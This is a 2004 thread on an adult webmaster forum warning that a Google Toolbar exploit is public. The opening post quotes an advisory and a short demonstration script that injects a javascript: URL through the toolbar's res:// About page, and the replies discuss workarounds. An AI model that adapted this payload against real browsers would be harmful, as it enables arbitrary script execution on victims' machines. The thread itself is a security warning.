GoFuckYourself.com - Adult Webmaster Forum - Careful, exploit for google toolbar is out

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)

- Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)

- - Careful, exploit for google toolbar is out (https://gfy.com/showthread.php?t=358387)

hydro

09-18-2004 08:21 AM

Careful, exploit for google toolbar is out

A remote user can execute arbitrary scripting code in the Local Computer security zone.

It is reported that the 'About' section of the Google Toolbar does not properly filter HTML code. A remote user can create HTML that, when loaded by the target user, will invoke the About page and execute arbitrary scripting code in the context of the page.

A demonstration exploit is provided:

<s c r i p t>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</s c r i p t>

CheneyRumsfeld

09-18-2004 08:23 AM

oh, shit

doober

09-18-2004 08:24 AM

so should i bust a cap in my googlebar or what?

are they planning to offer an update/patch ala microsoft?

Fake Nick

09-18-2004 08:26 AM

very smart to post an example code

TheSenator

09-18-2004 08:38 AM

nothing happens

arg	09-18-2004 08:42 AM

Use Firefox and if you want to see pageranks, install the extension below. Takes up a lot less space than google's toolbar.

Google Pagerank extension:

http://www.tapouillo.com/firefox_extension/

KRL	09-18-2004 08:42 AM

http://www.Opera.com

hydro

09-18-2004 08:45 AM

Quote:

Originally posted by doober
so should i bust a cap in my googlebar or what?

are they planning to offer an update/patch ala microsoft?

just disable it when your going to "questionable" sites. No word from google on an update but knowing them it won't take long.

All times are GMT -7. The time now is 12:59 PM.